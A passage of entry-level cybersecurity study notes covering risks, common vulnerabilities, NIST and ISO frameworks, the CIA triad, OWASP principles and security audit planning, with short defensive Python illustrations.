● Advanced persistent threats (APTs): A threat actor maintains unauthorized access to a system for an extended period of time.
Risks
A risk is anything that can impact the confidentiality, integrity, or availability of an asset. A basic formula
for determining the level of risk is that risk equals the likelihood of a threat. One way to think about this
is that a risk is being late to work and threats are traffic, an accident, a flat tire, etc.
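The reading treats risk as the likelihood of a threat. A common extension of that formula, which goes beyond this text and is stated here only as an assumption, also weighs the impact if the threat occurs: risk = likelihood × impact.

```python
# Hedged sketch of a common risk-scoring extension (likelihood x impact).
# The 1-3 scales and the commute examples are illustrative, not from
# the reading, which defines risk as the likelihood of a threat.

def risk_score(likelihood, impact):
    """Both inputs on a 1-3 scale (low/medium/high); higher = riskier."""
    return likelihood * impact


# Commute analogy from the text: heavy traffic is likely but low impact,
# while a flat tire is unlikely but would make you very late.
traffic = risk_score(likelihood=3, impact=1)
flat_tire = risk_score(likelihood=1, impact=3)
```

Under this scoring, both commute threats land at the same modest score, while a threat that is both likely and damaging would score far higher and demand attention first.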
There are different factors that can affect the likelihood of a risk to an organization’s assets, including:
● External risk: Anything outside the organization that has the potential to harm organizational assets, such as threat actors attempting to gain access to private information
● Internal risk: A current or former employee, vendor, or trusted partner who poses a security risk
● Legacy systems: Old systems that might not be accounted for or updated, but can still impact assets, such as workstations or old mainframe systems. For example, an organization might have an old vending machine that takes credit card payments or a workstation that is still connected to the legacy accounting system.
● Multiparty risk: Outsourcing work to third-party vendors can give them access to intellectual property, such as trade secrets, software designs, and inventions.
● Software compliance/licensing: Software that is not updated or in compliance, or patches that are not installed in a timely manner
There are many resources, such as the NIST, that provide lists of cybersecurity risks. Additionally, the
Open Web Application Security Project (OWASP) publishes a standard awareness document about the
top 10 most critical security risks to web applications, which is updated regularly.
Note: The OWASP’s common attack types list contains three new risks for the years 2017 to 2021:
insecure design, software and data integrity failures, and server-side request forgery. This update
emphasizes the fact that security is a constantly evolving field. It also demonstrates the importance of
staying up to date on current threat actor tactics and techniques, so you can be better prepared to
manage these types of risks.
Vulnerabilities
A vulnerability is a weakness that can be exploited by a threat. Therefore, organizations need to
regularly inspect for vulnerabilities within their systems. Some vulnerabilities include:
● ProxyLogon: A pre-authenticated vulnerability that affects the Microsoft Exchange server. This means a threat actor can complete a user authentication process to deploy malicious code from a remote location.
● ZeroLogon: A vulnerability in Microsoft’s Netlogon authentication protocol. An authentication protocol is a way to verify a person's identity. Netlogon is a service that ensures a user’s identity before allowing access to a website's location.
● Log4Shell: Allows attackers to run Java code on someone else’s computer or leak sensitive information. It does this by enabling a remote attacker to take control of devices connected to the internet and run malicious code.
● PetitPotam: Affects Windows New Technology Local Area Network (LAN) Manager (NTLM). It is a theft technique that allows a LAN-based attacker to initiate an authentication request.
● Security logging and monitoring failures: Insufficient logging and monitoring capabilities that result in attackers exploiting vulnerabilities without the organization knowing it
● Server-side request forgery: Allows attackers to manipulate a server-side application into accessing and updating backend resources. It can also allow threat actors to steal data.
As an entry-level security analyst, you might work in vulnerability management, which is monitoring a
system to identify and mitigate vulnerabilities. Although patches and updates may exist, if they are not
applied, intrusions can still occur. For this reason, constant monitoring is important. The sooner an
organization identifies a vulnerability and addresses it by patching it or updating their systems, the
sooner it can be mitigated, reducing the organization’s exposure to the vulnerability.
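The monitoring loop described here often boils down to comparing what is installed against what is known to be vulnerable. The inventory and the vulnerable-version data below are made up for illustration; real programs would pull this from an asset database and feeds like the NVD or CISA's catalog.

```python
# Hedged sketch of vulnerability management: compare installed software
# versions against known-vulnerable versions. All data is hypothetical.

INSTALLED = {
    "log4j": "2.14.1",
    "exchange-server": "15.2.986",
}

KNOWN_VULNERABLE = {
    # software -> set of versions with known, unpatched exploits
    "log4j": {"2.14.1"},  # e.g. a version affected by Log4Shell
}


def unpatched(installed, vulnerable):
    """Return software still running a known-vulnerable version."""
    return [name for name, version in installed.items()
            if version in vulnerable.get(name, set())]
```

Each run of `unpatched(INSTALLED, KNOWN_VULNERABLE)` yields the systems that still need patching, which is why the constant monitoring this section describes matters: the vulnerable set grows over time even when the inventory does not change.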
To learn more about the vulnerabilities explained in this section of the reading, as well as other
vulnerabilities, explore the NIST National Vulnerability Database and CISA Known Exploited
Vulnerabilities Catalog.
Key takeaways
In this reading, you learned about some risk management strategies and frameworks that can be used to
develop organization-wide policies and processes to mitigate threats, risks, and vulnerabilities. You also
learned about some of today’s most common threats, risks, and vulnerabilities to business operations.
Understanding these concepts can better prepare you to not only protect against, but also mitigate, the
types of security-related issues that can harm organizations and people alike.
Resources for more information
To learn more, click the linked terms in this reading. Also, consider exploring the following sites:
● OWASP Top Ten
● NIST RMF
Glossary terms from module 1
Terms and definitions from Course 2, Module 1
Assess: The fifth step of the NIST RMF that means to determine if established controls are implemented
correctly
Authorize: The sixth step of the NIST RMF that refers to being accountable for the security and privacy
risks that may exist in an organization
Business continuity: An organization's ability to maintain their everyday productivity by establishing
risk disaster recovery plans
Categorize: The second step of the NIST RMF that is used to develop risk management processes and
tasks
External threat: Anything outside the organization that has the potential to harm organizational assets
Implement: The fourth step of the NIST RMF that means to implement security and privacy plans for an
organization
Internal threat: A current or former employee, external vendor, or trusted partner who poses a security
risk
Monitor: The seventh step of the NIST RMF that means to be aware of how systems are operating
Prepare: The first step of the NIST RMF related to activities that are necessary to manage security and
privacy risks before a breach occurs
Ransomware: A malicious attack where threat actors encrypt an organization’s data and demand
payment to restore access
Risk: Anything that can impact the confidentiality, integrity, or availability of an asset
Risk mitigation: The process of having the right procedures and rules in place to quickly reduce the
impact of a risk like a breach
Security posture: An organization’s ability to manage its defense of critical assets and data and react to
change
Select: The third step of the NIST RMF that means to choose, customize, and capture documentation of
the controls that protect an organization
Shared responsibility: The idea that all individuals within an organization take an active role in lowering
risk and maintaining both physical and virtual security
Social engineering: A manipulation technique that exploits human error to gain private information,
access, or valuables
Vulnerability: A weakness that can be exploited by a threat
Security Frameworks and Controls
In this section of the course, we'll discuss security frameworks, controls, and design principles in more
detail, and how they can be applied to security audits to help protect organizations and people. The NIST
Cybersecurity Framework plays a large part in this. The framework ensures the protection and
compliance of customer tools and personal work devices through the use of security controls.
Frameworks
In an organization, plans are put in place to protect against a variety of threats,
risks, and vulnerabilities. However, the requirements used to protect organizations and people
often overlap. Because of this, organizations use security frameworks as a starting point to create
their own security policies and processes. Let's start by quickly reviewing what frameworks are.
Security frameworks are guidelines used for building plans to help mitigate risks and threats to
data and privacy, such as social engineering attacks and ransomware. Security involves more than
just the virtual space. It also includes the physical, which is why many organizations have plans to
maintain safety in the work environment. For example, access to a building may require using a key
card or badge. Other security frameworks provide guidance for how to prevent, detect, and respond
to security breaches. This is particularly important when trying to protect an organization from
social engineering attacks like phishing that target their employees. Remember, people are the
biggest threat to security. So frameworks can be used to create plans that increase employee
awareness and educate them about how they can protect the organization, their co-workers, and
themselves. Educating employees about existing security challenges is essential for minimizing the
possibility of a breach. Providing employee training about how to recognize red flags, or potential
threats, is essential, along with having plans in place to quickly report and address security issues. As
an analyst, it will be important for you to understand and implement the plans your organization has in
place to keep the organization, its employees, and the people it serves safe from social engineering
attacks, breaches, and other harmful security incidents. Coming up, we'll review and discuss security
controls, which are used alongside frameworks to achieve an organization's security goals.
Controls
While frameworks are used to create plans to address security risks, threats, and vulnerabilities,
controls are used to reduce specific risks. If proper controls are not in place, an organization could
face significant financial impacts and damage to their reputation because of exposure to risks
including trespassing, creating fake employee accounts, or providing free benefits. Let's review the
definition of controls. Security controls are safeguards designed to reduce
specific security risks. In this video, we'll discuss three common types of controls: encryption,
authentication, and authorization.
Encryption is the process of converting data from a readable format to an encoded format. Typically,
encryption involves converting data from plaintext to ciphertext. Ciphertext is the raw, encoded
message that's unreadable to humans and computers. Ciphertext data cannot be read until it's been
decrypted into its original plaintext form. Encryption is used to ensure confidentiality of sensitive
data, such as customers' account information or social security numbers. Another control that can
be used to protect sensitive data is authentication.
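To make the plaintext-to-ciphertext conversion concrete, here is a toy Python sketch using a simple XOR cipher. This is only an illustration of the concept; real systems use vetted algorithms such as AES, never a cipher like this:

```python
def xor_cipher(data: bytes, key: bytes) -> bytes:
    # XOR each byte with a repeating key; applying the same key twice
    # converts plaintext to ciphertext and back again
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

plaintext = b"Account: 1234-5678"
ciphertext = xor_cipher(plaintext, b"secret")  # encoded, unreadable form
decrypted = xor_cipher(ciphertext, b"secret")  # original plaintext restored
```

Because the same key both encrypts and decrypts, this models symmetric encryption: the ciphertext stays unreadable until it is decrypted with the key.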
Authentication is the process of verifying who someone or something is. A real-world example of
authentication is logging into a website with your username and password. This basic form of
authentication proves that you know the username and password and should be allowed to access
the website. More advanced methods of authentication, such as multi-factor authentication, or MFA,
challenge the user to demonstrate that they are who they claim to be by requiring both a password
and an additional form of authentication, like a security code or biometrics, such as a fingerprint,
voice, or face scan. Biometrics are unique physical characteristics that can be used to verify a
person's identity. Examples of biometrics are a fingerprint, an eye scan, or a palm scan. One example
of a social engineering attack that can exploit biometrics is vishing. Vishing is the exploitation of
electronic voice communication to obtain sensitive information or to impersonate a known source.
For example, vishing could be used to impersonate a person's voice to steal their identity and then
commit a crime. Another very important security control is authorization.
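The one-time security codes used by many MFA apps can be sketched with the time-based one-time password (TOTP) algorithm from RFC 6238. This is a minimal standard-library implementation, with an example secret used purely for illustration:

```python
import hashlib
import hmac
import struct
import time

def totp(secret: bytes, for_time=None, step: int = 30, digits: int = 6) -> str:
    """Derive a short-lived numeric code from a shared secret (RFC 6238)."""
    if for_time is None:
        for_time = int(time.time())
    counter = struct.pack(">Q", for_time // step)       # 30-second time window
    digest = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                          # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# The server and the user's authenticator app share the secret, so both
# can compute the same code for the current time window.
shared_secret = b"12345678901234567890"  # example secret, not a real credential
code = totp(shared_secret)
```

A login flow would compare the code the user submits against `totp(shared_secret)` using `hmac.compare_digest`, typically also accepting the adjacent time window to allow for clock drift.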
Authorization refers to the concept of granting access to specific resources within a system.
Essentially, authorization is used to verify that a person has permission to access a resource. As an
example, if you're working as an entry-level security analyst for the federal government, you could
have permission to access data through the deep web or other internal data that is only accessible if
you're a federal employee. The security controls we discussed today are only one element of a core
security model known as the CIA triad.
The relationship between frameworks and controls
Previously, you learned how organizations use security frameworks and controls to protect against
threats, risks, and vulnerabilities. This included discussions about the National Institute of Standards
and Technology’s (NIST’s) Risk Management Framework (RMF) and Cybersecurity Framework (CSF), as
well as the confidentiality, integrity, and availability (CIA) triad. In this reading, you will further explore
security frameworks and controls and how they are used together to help mitigate organizational risk.
Frameworks and controls
Security frameworks are guidelines used for building plans to help mitigate risk and threats to data and
privacy. Frameworks support organizations’ ability to adhere to compliance laws and regulations. For
example, the healthcare industry uses frameworks to comply with the United States’ Health Insurance
Portability and Accountability Act (HIPAA), which requires that medical professionals keep patient
information safe.
Security controls are safeguards designed to reduce specific security risks. Security controls are the
measures organizations use to lower risk and threats to data and privacy. For example, a control that
can be used alongside frameworks to ensure a hospital remains compliant with HIPAA is requiring that
patients use multi-factor authentication (MFA) to access their medical records. Using a measure like
MFA to validate someone’s identity is one way to help mitigate potential risks and threats to private
data.
Specific frameworks and controls
There are many different frameworks and controls that organizations can use to remain compliant with
regulations and achieve their security goals. Frameworks covered in this reading are the Cyber Threat
Framework (CTF) and the International Organization for Standardization/International Electrotechnical
Commission (ISO/IEC) 27001. Several common security controls, used alongside these types of
frameworks, are also explained.
Cyber Threat Framework (CTF)
According to the Office of the Director of National Intelligence, the CTF was developed by the U.S.
government to provide “a common language for describing and communicating information about cyber
threat activity.” By providing a common language to communicate information about threat activity, the
CTF helps cybersecurity professionals analyze and share information more efficiently. This allows
organizations to improve their response to the constantly evolving cybersecurity landscape and threat
actors' many tactics and techniques.
International Organization for Standardization/International Electrotechnical Commission
(ISO/IEC) 27001
An internationally recognized and used framework is ISO/IEC 27001. The ISO 27000 family of standards
enables organizations of all sectors and sizes to manage the security of assets, such as financial
information, intellectual property, employee data, and information entrusted to third parties. This
framework outlines requirements for an information security management system, best practices, and
controls that support an organization’s ability to manage risks. Although the ISO/IEC 27001 framework
does not require the use of specific controls, it does provide a collection of controls that organizations
can use to improve their security posture.
Controls
Controls are used alongside frameworks to reduce the possibility and impact of a security threat, risk, or
vulnerability. Controls can be physical, technical, and administrative and are typically used to prevent,
detect, or correct security issues.
Examples of physical controls:
● Gates, fences, and locks
● Security guards
● Closed-circuit television (CCTV), surveillance cameras, and motion detectors
● Access cards or badges to enter office spaces
Examples of technical controls:
● Firewalls
● MFA
● Antivirus software
Examples of administrative controls:
● Separation of duties
● Authorization
● Asset classification
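An analyst cataloging an organization's safeguards might group them into these three categories. The sketch below is a hypothetical illustration; the control names and the `classify_control` helper are invented for the example:

```python
# Hypothetical mapping of example controls to the three control categories
CONTROL_CATEGORIES = {
    "physical": {"gate", "lock", "security guard", "cctv", "access badge"},
    "technical": {"firewall", "mfa", "antivirus"},
    "administrative": {"separation of duties", "authorization", "asset classification"},
}

def classify_control(name: str) -> str:
    """Return the category of a control, or 'unclassified' if unknown."""
    for category, controls in CONTROL_CATEGORIES.items():
        if name.lower() in controls:
            return category
    return "unclassified"
```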
To learn more about controls, particularly those used to protect health-related assets from a variety of
threat types, review the U.S. Department of Health and Human Services’ Physical Access Control
presentation.
Key takeaways
Cybersecurity frameworks and controls are used together to establish an organization’s security
posture. They also support an organization’s ability to meet security goals and comply with laws and
regulations. Although these frameworks and controls are typically voluntary, organizations are strongly
encouraged to implement and use them to help ensure the safety of critical assets.
Explore the CIA Triad
The CIA triad is a model that helps inform how organizations consider risk when setting up systems
and security policies. As a reminder, the three letters in the CIA triad stand for confidentiality,
integrity, and availability. As an entry-level analyst, you'll find yourself constantly referring to these
three core principles as you work to protect your organization and the people it serves.
Confidentiality means that only authorized users can access specific assets or data. Sensitive data
should be available on a "need to know" basis, so that only the people who are authorized to handle
certain assets or data have access. Integrity means that the data is correct, authentic, and reliable.
Determining the integrity of data and analyzing how it's used will help you, as a security
professional, decide whether the data can or cannot be trusted. Availability means that the data is
accessible to those who are authorized to access it. Inaccessible data isn't useful and can prevent
people from being able to do their jobs. As a security professional, ensuring that systems, networks,
and applications are functioning properly to allow for timely and reliable access, may be a part of
your everyday work responsibilities. Now that we've defined the CIA triad and its components, let's
explore how you might use the CIA triad to protect an organization. If you work for an organization
that has large amounts of private data like a bank, the principle of confidentiality is essential
because the bank must keep people's personal and financial information safe. The principle of
integrity is also a priority. For example, if a person's spending habits or purchasing locations
change dramatically, the bank will likely disable access to the account until they can verify that the
account owner, not a threat actor, is actually the one making purchases. The availability principle is
also critical. Banks put a lot of effort into making sure that people can access their account
information easily on the web. And to make sure that information is protected from threat actors,
banks use a validation process to help minimize damage if they suspect that customer accounts
have been compromised. As an analyst, you'll regularly use each component of the triad to help
protect your organization and the people it serves. And having the CIA triad constantly in mind, will
help you keep sensitive data and assets safe from a variety of threats, risks, and vulnerabilities
including the social engineering attacks, malware, and data theft we discussed earlier.
Use the CIA triad to protect organizations
Previously, you were introduced to the confidentiality, integrity, and availability (CIA) triad and how it
helps organizations consider and mitigate risk. In this reading, you will learn how cybersecurity analysts
use the CIA triad in the workplace.
The CIA triad for analysts
The CIA triad is a model that helps inform how organizations consider risk when setting up systems and
security policies. It is made up of three elements that cybersecurity analysts and organizations work
toward upholding: confidentiality, integrity, and availability. Maintaining an acceptable level of risk and
ensuring systems and policies are designed with these elements in mind helps establish a successful
security posture, which refers to an organization’s ability to manage its defense of critical assets and
data and react to change.
Confidentiality
Confidentiality is the idea that only authorized users can access specific assets or data. In an
organization, confidentiality can be enhanced through the implementation of design principles, such as
the principle of least privilege. The principle of least privilege limits users' access to only the
information they need to complete work-related tasks. Limiting access is one way of maintaining the
confidentiality and security of private data.
Integrity
Integrity is the idea that the data is verifiably correct, authentic, and reliable. Having protocols in place
to verify the authenticity of data is essential. One way to verify data integrity is through cryptography,
which is used to transform data so unauthorized parties cannot read or tamper with it (NIST, 2022).
Another example of how an organization might implement integrity is by enabling encryption, which is
the process of converting data from a readable format to an encoded format. Encryption can be used to
prevent access and ensure data, such as messages on an organization's internal chat platform, cannot be
tampered with.
Availability
Availability is the idea that data is accessible to those who are authorized to use it. When a system
adheres to both availability and confidentiality principles, data can be used when needed. In the
workplace, this could mean that the organization allows remote employees to access its internal
network to perform their jobs. It’s worth noting that access to data on the internal network is still
limited, depending on what type of access employees need to do their jobs. If, for example, an employee
works in the organization’s accounting department, they might need access to corporate accounts but
not data related to ongoing development projects.
Key takeaways
The CIA triad is essential for establishing an organization’s security posture. Knowing what it is and how
it’s applied can help you better understand how security teams work to protect organizations and the
people they serve.
NIST Frameworks
Organizations use frameworks as a starting point to develop
plans that mitigate risks, threats, and vulnerabilities to sensitive data and assets. Fortunately, there
are organizations worldwide that create frameworks
security professionals can use to develop those plans. In this video, we'll
discuss two frameworks from the National Institute of
Standards and Technology, or NIST, that can support ongoing security efforts for all
types of organizations, including for profit and nonprofit businesses, as well as government
agencies. While NIST is a US based organization, the guidance it provides can help analysts all over
the world understand how to implement essential cybersecurity practices. One NIST framework
that we'll discuss throughout the program is the NIST Cybersecurity Framework, or CSF. The CSF is
a voluntary framework that consists of standards, guidelines, and best practices to manage
cybersecurity risk. This framework is widely respected and essential for maintaining security
regardless of the organization you work for. The CSF consists of five important core functions,
identify, protect, detect, respond, and recover, which we'll discuss in detail in a future video. For
now, we'll focus on how the CSF benefits organizations and how it can be used to protect against
threats, risks, and vulnerabilities by providing a workplace example. Imagine that one morning you
receive a high-risk notification that a workstation has been compromised. You identify the
workstation, and discover that there's an unknown device plugged into it. You block the unknown
device remotely to stop any potential threat and protect the organization. Then you remove the
infected workstation to prevent the spread of the damage and use tools to detect any additional
threat actor behavior and identify the unknown device. You respond by investigating the incident to
determine who used the unknown device, how the threat occurred, what was affected, and where
the attack originated. In this case, you discover that an employee was charging their infected phone
using a USB port on their work laptop. Finally, you do your best to recover any files or data that
were affected and correct any damage the threat caused to the workstation itself. As demonstrated
by the previous example, the core functions of the NIST CSF provide specific guidance and direction
for security
professionals. This framework is used to develop plans to handle an incident appropriately
and quickly to lower risk, protect an organization against a threat, and mitigate any potential
vulnerabilities. The NIST CSF also expands into the protection of the United States federal
government with NIST special publication, or SP 800-53. It provides a unified framework for
protecting the security of information systems within the federal government, including the
systems provided by private companies for federal government use. The security controls provided
by this framework are used to maintain the CIA triad for those systems used by the government.
Isn't it amazing how all these frameworks and controls work together? We've discussed some
important security topics in this video that will be very useful for you as you continue your security
journey. Because they're core elements of the security profession, the NIST CSF is a useful
framework that most security professionals are familiar with, and understanding NIST SP 800-53 is crucial if you have an interest in working for the US federal government.
Explore the five functions of the NIST Cybersecurity Framework
The NIST CSF focuses on five core functions: identify, protect, detect, respond, and recover. These core
functions help organizations manage cybersecurity risks, implement risk
management strategies, and learn from previous mistakes. Basically, when it comes to security
operations, NIST CSF functions are key for making sure an organization is protected against
potential threats, risks, and vulnerabilities.
The first core function is identify, which is related to the management of cybersecurity risk and its
effect on an organization's people and assets. For example, as a security analyst, you may be asked
to monitor systems and devices in your organization's internal network to identify potential
security issues.
The second core function is protect, which is the strategy used to protect an organization through
the implementation of policies, procedures, training, and tools that help mitigate
cybersecurity threats. For example, as a security analyst, you and your team might encounter new
and unfamiliar threats and attacks. For this reason, studying historical data and making
improvements to policies and procedures is essential.
The third core function is detect, which means identifying potential security incidents and
improving monitoring capabilities to increase the speed and efficiency of detections. For example,
as an analyst, you might be asked to review a new security tool's setup to make sure it's flagging
low, medium, or high risk, and then alerting the security team about any potential threats or
incidents.
The fourth function is respond, which means making sure that the proper procedures are used to
contain, neutralize, and analyze security incidents, and implement improvements to the security
process. As an analyst, you could be working with a team to collect and organize data to document
an incident and suggest improvements to processes to prevent the incident from happening again.
The fifth core function is recover, which is the process of returning affected systems back to normal
operation. For example, as an entry-level security analyst, you might work with
your security team to restore systems, data, and assets, such as financial or legal files, that have
been affected by an incident like a breach.
From proactive to reactive measures, all five functions are essential for making sure
that an organization has effective security strategies in place. Security incidents are going to
happen, but an organization must have the ability to quickly recover from any damage caused by an
incident to minimize their level of risk.
OWASP security principles
This reading covers Open Web Application Security Project, recently renamed Open Worldwide Application
Security Project® (OWASP), security principles and how entry-level analysts use them.
Security principles
In the workplace, security principles are embedded in your daily tasks. Whether you are
analyzing logs, monitoring a security information and event management (SIEM)
dashboard, or using a vulnerability scanner, you will use these principles in some way.
Previously, you were introduced to several OWASP security principles. These included:
● Minimize attack surface area: Attack surface refers to all the potential vulnerabilities a threat actor could exploit.
● Principle of least privilege: Users have the least amount of access required to perform their everyday tasks.
● Defense in depth: Organizations should have varying security controls that mitigate risks and threats.
● Separation of duties: Critical actions should rely on multiple people, each of whom follow the principle of least privilege.
● Keep security simple: Avoid unnecessarily complicated solutions. Complexity makes security difficult.
● Fix security issues correctly: When security incidents occur, identify the root cause, contain the impact, identify vulnerabilities, and conduct tests to ensure that remediation is successful.
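The principle of least privilege can be sketched as a simple default-deny permission check. The roles and actions below are hypothetical examples, not a real access policy:

```python
# Each role is granted only the actions needed for its everyday tasks
ROLE_PERMISSIONS = {
    "analyst": {"read_logs", "run_scans"},
    "manager": {"read_logs", "run_scans", "approve_changes"},
}

def is_authorized(role: str, action: str) -> bool:
    # Default-deny: unknown roles and unlisted actions are refused
    return action in ROLE_PERMISSIONS.get(role, set())
```

Here an analyst can read logs but cannot approve changes, and any role missing from the table gets no access at all.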
Additional OWASP security principles
Next, you’ll learn about four additional OWASP security principles that cybersecurity
analysts and their teams use to keep organizational operations and people safe.
Establish secure defaults
This principle means that the optimal security state of an application is also its default state
for users; it should take extra work to make the application insecure.
Fail securely
Fail securely means that when a control fails or stops, it should do so by defaulting to its
most secure option. For example, when a firewall fails, it should simply close all connections
and block all new ones, rather than start accepting everything.
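Failing securely can be sketched in a few lines of Python. The access-control service here is a hypothetical stand-in; a real one might be a network call that can time out:

```python
class AccessControlService:
    """Hypothetical permission lookup; a real one might be a network call."""
    def __init__(self, allowed_users, healthy=True):
        self._allowed = set(allowed_users)
        self._healthy = healthy

    def lookup(self, user):
        if not self._healthy:
            raise ConnectionError("control unavailable")
        return user in self._allowed

def is_allowed(user, service):
    try:
        return service.lookup(user)
    except Exception:
        # Fail securely: if the control breaks, default to deny
        return False
```

When the service is down, `is_allowed` denies everyone rather than failing open and accepting everything.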
Don’t trust services
Many organizations work with third-party partners. These outside partners often have
different security policies than the organization does. And the organization shouldn’t
assume that their partners’ systems are secure. For example, if a third-party vendor
tracks reward points for airline customers, the airline should ensure that the balance is
accurate before sharing that information with their customers.
Avoid security by obscurity
The security of key systems should not rely on keeping details hidden. Consider the
following example from OWASP (2016):
The security of an application should not rely on keeping the source code secret. Its
security should rely upon many other factors, including reasonable password policies,
defense in depth, business transaction limits, solid network architecture, and fraud and
audit controls.
Key takeaways
Cybersecurity professionals are constantly applying security principles to safeguard
organizations and the people they serve. As an entry-level security analyst, you can use
these security principles to promote safe development practices that reduce risks to
companies and users alike.
Plan a security audit
There are two main types of security audits:
external and internal. We'll focus on internal security audits because those are the types of audits
that
entry-level analysts might be asked to contribute to. An internal security audit is typically conducted
by a team of people that might include an organization's compliance officer, security manager, and
other security team members. Internal security audits are used to help improve an organization's
security posture and help organizations avoid fines from governing agencies due to a lack of
compliance. Internal security audits help security teams identify organizational risk, assess
controls, and correct compliance issues. Now that we've discussed the purposes of internal audits,
let's cover some common elements of internal audits. These include establishing the scope and goals
of the audit, conducting a risk assessment of the organization's assets, completing a controls
assessment, assessing compliance, and communicating results to stakeholders. In this video, we'll
cover the first two elements, which are a part of the audit planning process: establishing the scope
and goals, then completing a risk assessment. Scope refers to the specific criteria of an internal
security audit. Scope requires organizations to identify people, assets, policies, procedures, and
technologies that might impact an organization's security posture. Goals are an outline of the
organization's security objectives, or what they want to achieve to improve their security posture.
Although more senior-level security team members and other stakeholders usually establish the
scope and goals of the audit, entry-level analysts might be asked to review and understand the
scope and goals to complete other elements of the audit. As an example, the scope of this audit
involves assessing user permissions; identifying existing controls, policies, and procedures; and
accounting for the technology currently in use by the organization. The goals outlined include
implementing core functions of frameworks, like the NIST CSF; establishing policies and procedures
to ensure compliance; and strengthening system controls. The next element is conducting a risk
assessment, which is focused on identifying potential threats, risks, and vulnerabilities. This helps
organizations consider what security measures should be implemented and monitored to ensure
the safety of assets. Similar to establishing the scope and goals, a risk assessment is oftentimes
completed by managers or other stakeholders. However, you might be asked to analyze details
provided in the risk assessment to consider what types of controls and compliance regulations need
to be in place to help improve the organization's security posture. For example, this risk assessment
highlights that there are inadequate controls, processes, and procedures in place to protect the
organization's assets. Specifically, there is a lack of proper management of physical and digital
assets, including employee equipment. The equipment used to store data is not properly secured.
And access to private information stored in the organization's internal network likely needs more
robust controls in place.
The remaining elements are completing a controls assessment, assessing compliance, and
communicating results. Before completing these last three elements, you'll need to review the scope
and goals, as well as the risk assessment, and ask yourself some questions. For example: What is the
audit meant to achieve? Which assets are most at risk? Are current controls sufficient to protect
those assets? If not, what controls and compliance regulations need to be implemented?
Considering questions like these can support your ability to complete the next element: a controls
assessment. A controls assessment involves closely reviewing an organization's existing assets, then
evaluating potential risks to those assets, to ensure internal controls and processes are effective. To
do this, entry-level analysts might be tasked with classifying controls into the following categories:
administrative controls, technical controls, and physical controls. Administrative controls are
related to the human component of cybersecurity. They include policies and procedures that define
how an organization manages data, such as the implementation of password policies. Technical
controls are hardware and software solutions used to protect assets, such as the use of intrusion
detection systems, or IDSs, and encryption. Physical controls refer to measures put in place to
prevent physical access to protected assets, such as surveillance cameras and locks. The next
element is determining whether the organization is adhering to necessary compliance regulations.
As a reminder, compliance regulations are laws that organizations must follow to ensure private
data remains secure. In this example, the organization conducts business in the European Union
and accepts credit card payments. So they need to adhere to the GDPR and Payment Card Industry
Data Security Standard, or PCI DSS. The final common element of an internal security audit is
communication. Once the internal security audit is complete, results and recommendations need to
be communicated to stakeholders. In general, this type of communication summarizes the scope
and goals of the audit. Then, it lists existing risks and notes how quickly those risks need to be
addressed. Additionally, it identifies compliance regulations the organization needs to adhere to
and provides recommendations for improving the organization's security posture. Internal audits
are a great way to identify gaps within an organization. When I worked at a previous company, my
team and I conducted an internal password audit and found that many of the passwords were weak.
Once we identified this issue, the compliance team took the lead and began enforcing stricter
password policies. Audits are an opportunity to determine what security measures an organization
has in place and what areas need to be improved to achieve the organization's desired security
posture. Security audits are quite involved, yet of extreme value to organizations.
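A password audit like the one described might flag weak passwords with checks along these lines. The thresholds below are illustrative, not an official policy:

```python
import re

def is_weak(password: str) -> bool:
    # Flag passwords that are short or lack character variety
    return (
        len(password) < 12
        or not re.search(r"[A-Z]", password)
        or not re.search(r"[a-z]", password)
        or not re.search(r"\d", password)
    )

# Counting weak entries across a sample set gives the audit its findings
weak_count = sum(is_weak(p) for p in ["password", "Str0ngPassphrase", "abc123"])
```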
More about security audits
Previously, you were introduced to how to plan and complete an internal security audit. In this reading,
you will learn more about security audits, including the goals and objectives of audits.
Security audits
A security audit is a review of an organization's security controls, policies, and procedures against a set
of expectations. Audits are independent reviews that evaluate whether an organization is meeting
internal and external criteria. Internal criteria include outlined policies, procedures, and best practices.
External criteria include regulatory compliance, laws, and federal regulations.
Additionally, a security audit can be used to assess an organization's established security controls. As a
reminder, security controls are safeguards designed to reduce specific security risks.
Audits help ensure that security checks are made (e.g., daily monitoring of security information and event management dashboards) to identify threats, risks, and vulnerabilities. This helps maintain an organization’s security posture. And, if there are security issues, a remediation process must be in place.
Goals and objectives of an audit
The goal of an audit is to ensure an organization's information technology (IT) practices are meeting
industry and organizational standards. The objective is to identify and address areas of remediation and
growth. Audits provide direction and clarity by identifying what the current failures are and developing
a plan to correct them.
Security audits must be performed to safeguard data and avoid penalties and fines from governmental
agencies. The frequency of audits is dependent on local laws and federal compliance regulations.
Factors that affect audits
Factors that determine the types of audits an organization implements include:
● Industry type
● Organization size
● Ties to the applicable government regulations
● A business’s geographical location
● A business decision to adhere to a specific regulatory compliance
To review common compliance regulations that different organizations need to adhere to, refer to the
reading about controls, frameworks, and compliance.
The role of frameworks and controls in audits
Along with compliance, it’s important to mention the role of frameworks and controls in security audits.
Frameworks such as the National Institute of Standards and Technology Cybersecurity Framework
(NIST CSF) and the international standard for information security (ISO 27000) series are designed to
help organizations prepare for regulatory compliance security audits. By adhering to these and other
relevant frameworks, organizations can save time when conducting external and internal audits.
Additionally, frameworks, when used alongside controls, can support organizations’ ability to align with
regulatory compliance requirements and standards.
There are three main categories of controls to review during an audit, which are administrative and/or
managerial, technical, and physical controls. To learn more about specific controls related to each
category, click the following link and select “Use Template.”
Link to template: Control categories
Audit checklist
It’s necessary to create an audit checklist before conducting an audit. A checklist is generally made up of
the following areas of focus:
Identify the scope of the audit
● The audit should:
o List assets that will be assessed (e.g., firewalls are configured correctly, PII is secure, physical assets are locked, etc.)
o Note how the audit will help the organization achieve its desired goals
o Indicate how often an audit should be performed
o Include an evaluation of organizational policies, protocols, and procedures to make sure they are working as intended and being implemented by employees
Complete a risk assessment
● A risk assessment is used to evaluate identified organizational risks related to budget, controls, internal processes, and external standards (i.e., regulations).
Conduct the audit
● When conducting an internal audit, you will assess the security of the identified assets listed in the audit scope.
Create a mitigation plan
● A mitigation plan is a strategy established to lower the level of risk and potential costs, penalties, or other issues that can negatively affect the organization’s security posture.
Communicate results to stakeholders
● The result of this process is a detailed report of findings, suggested improvements needed to lower the organization's level of risk, and compliance regulations and standards the organization needs to adhere to.
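The checklist steps above lend themselves to a simple data representation. The following Python sketch is purely illustrative (the control names and yes/no answers are invented, not taken from any real audit) and shows one way an auditor might tally results from a controls checklist before communicating them to stakeholders:

```python
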